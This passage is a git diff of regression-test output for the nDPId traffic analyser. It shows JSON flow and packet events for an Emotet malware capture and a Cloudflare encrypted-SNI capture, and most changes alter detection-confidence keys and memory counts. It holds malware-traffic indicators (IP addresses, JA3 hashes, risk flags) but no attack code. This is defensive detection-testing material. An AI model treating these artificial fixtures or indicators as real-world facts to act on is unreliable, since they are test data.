00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2359,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1650905469778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905469778,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0C9hAAIAGrVgKBBllisWTZcKMAbv+vEuFAAAAAIAC\/\/8e8wAAAgQFtAEDAwgBAQQC"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2360,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1650905469855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905469855,"pkt":"AAgCHEeuIOUqtpPxCABFAAA0AABAADAGCTGKxZNlCgQZZQG7woy1bvT7\/rxLhoAS+vB5zwAAAgQFbAEBBAIBAwMH"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2361,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1650905469855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650905469855,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoC9lAAIAGrWMKBBllisWTZcKMAbv+vEuGtW70\/FAQBACxSgAAAAAAAAAA"} 
-01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905469778,"flow_last_seen":1650905469856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1650905469856,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2364,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905469778,"flow_last_seen":1650905469964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1650905469964,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":564,"flow_first_seen":1650905413858,"flow_last_seen":1650905415845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":544468,"flow_avg_l4_payload_len":965,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -01027{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":136,"flow_first_seen":1650905467542,"flow_last_seen":1650905495928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":96457,"flow_avg_l4_payload_len":709,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": 
{"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1650905469778,"flow_last_seen":1650905518385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":2380,"packets-processed":2380,"total-skipped-flows":0,"total-l4-payload-len":1995225,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":5,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1650905518385} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905469778,"flow_last_seen":1650905469856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1650905469856,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2364,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905469778,"flow_last_seen":1650905469964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1650905469964,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 
+00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":564,"flow_first_seen":1650905413858,"flow_last_seen":1650905415845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":544468,"flow_avg_l4_payload_len":965,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +01027{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":136,"flow_first_seen":1650905467542,"flow_last_seen":1650905495928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":96457,"flow_avg_l4_payload_len":709,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1650905469778,"flow_last_seen":1650905518385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":2380,"packets-processed":2380,"total-skipped-flows":0,"total-l4-payload-len":1995225,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":46,"global_ts_msec":1650905518385} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2380/2380 ~~ skipped flows.............: 0 
@@ -53,9 +52,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5950633 bytes -~~ total memory freed........: 5950633 bytes -~~ total allocations/frees...: 120536/120536 +~~ total memory allocated....: 6084247 bytes +~~ total memory freed........: 6084247 bytes +~~ total allocations/frees...: 123297/123297 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 1473 chars diff --git a/test/results/encrypted_sni.pcap.out b/test/results/encrypted_sni.pcap.out index f5d1d1596..95610d5b1 100644 --- a/test/results/encrypted_sni.pcap.out +++ b/test/results/encrypted_sni.pcap.out 
@@ -2,13 +2,13 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 